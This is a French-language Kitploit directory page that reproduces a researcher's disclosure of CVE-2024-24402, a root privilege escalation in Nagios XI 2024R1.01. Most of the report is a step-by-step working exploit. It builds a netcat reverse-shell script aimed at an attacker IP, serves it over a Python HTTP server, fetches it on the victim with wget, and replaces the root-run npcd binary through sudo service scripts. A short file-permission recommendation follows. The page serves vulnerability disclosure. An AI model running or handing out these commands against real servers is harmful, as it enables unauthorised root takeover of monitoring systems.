Skip to content
KitploitKITPLOIT
OutilsBlog
Soumettre
OutilsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
CVE-2024-24402 — Priv esc in Nagios 2024R1.01 | Kitploit
Outils/GitHubGitHub/mawk0235/cve-2024-24402
Privilege EscalationVulnerability AnalysisExploitationPost-ExploitationPenetration TestingRed Teaming
GitHubmawk0235/cve-2024-24402

CVE-2024-24402

Priv esc in Nagios 2024R1.01

Voir le dépôt
4il y a 2 ansPas encore vérifié

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
Partager

Rapport de vulnérabilité

CVE découverte par : Jarod Jaslow (MAWK)

Détails de la vulnérabilité :

  • Point de terminaison : Nagios XI Version 2024R1.01
  • Type de vulnérabilité : Élévation de privilèges à partir de l'utilisateur « NAGIOS »
  • Résultat de l'exploitation : Accès root complet sur le système cible

Étapes pour reproduire :

1. Créer une instance fraîche de Nagios XI Version 2024R1.01 :

  • Télécharger le fichier OVA de Nagios XI depuis : https://assets.nagios.com/downloads/nagiosxi/2024/ovf/nagiosxi-2024R1.0.1-64.ova
  • Déployer l'OVA pour créer une instance fraîche. -Utiliser mon rapport précédent pour obtenir une RCE sur le serveur

2. Abuser de l'élévation de privilèges :

  • En tant qu'utilisateur « NAGIOS », créer un fichier sur la machine attaquante avec le contenu suivant :

    root@kitploit:~
    #!/bin/bash
    nc -e /bin/bash <Attacker IP> 4445
    

Pasted image 20240118113554

  • Héberger le fichier sur la machine attaquante via un serveur HTTP Python :

    root@kitploit:~
    python3 -m http.server 8000
    

Pasted image 20240118173813

  • Démarrer un serveur d'écoute Netcat (NC) sur la machine attaquante :

    root@kitploit:~
    nc -nlvp 4445
    

Pasted image 20240118173831

3. Exécuter l'exploitation sur la machine victime :

  • Récupérer le fichier depuis la machine attaquante :

    root@kitploit:~
    wget http://<Attacker IP>:8000/npcd
    

Pasted image 20240118173846

  • Exécuter les commandes suivantes pour élever les privilèges et recevoir une connexion en tant que root :

    root@kitploit:~
    sudo /usr/local/nagiosxi/scripts/manage_services.sh stop npcd
    cp npcd /usr/local/nagios/bin/npcd
    sudo /usr/local/nagiosxi/scripts/manage_services.sh start npcd
    

Pasted image 20240118173857

Pasted image 20240118173915

Recommandation :

Il est recommandé de restreindre la capacité de l'utilisateur « NAGIOS » à écrire dans les exécutables des services Nagios qui sont exécutés en tant que root. Cela peut être réalisé en mettant en œuvre des permissions de fichiers et des contrôles d'accès plus stricts pour les répertoires et fichiers pertinents associés aux services Nagios.

Cela devrait être corrigé dans les nouvelles versions

CVE :

https://cve.mitre.org/cgi-bin/cvename.cgi?name=2024-24402

Télécharger l’outil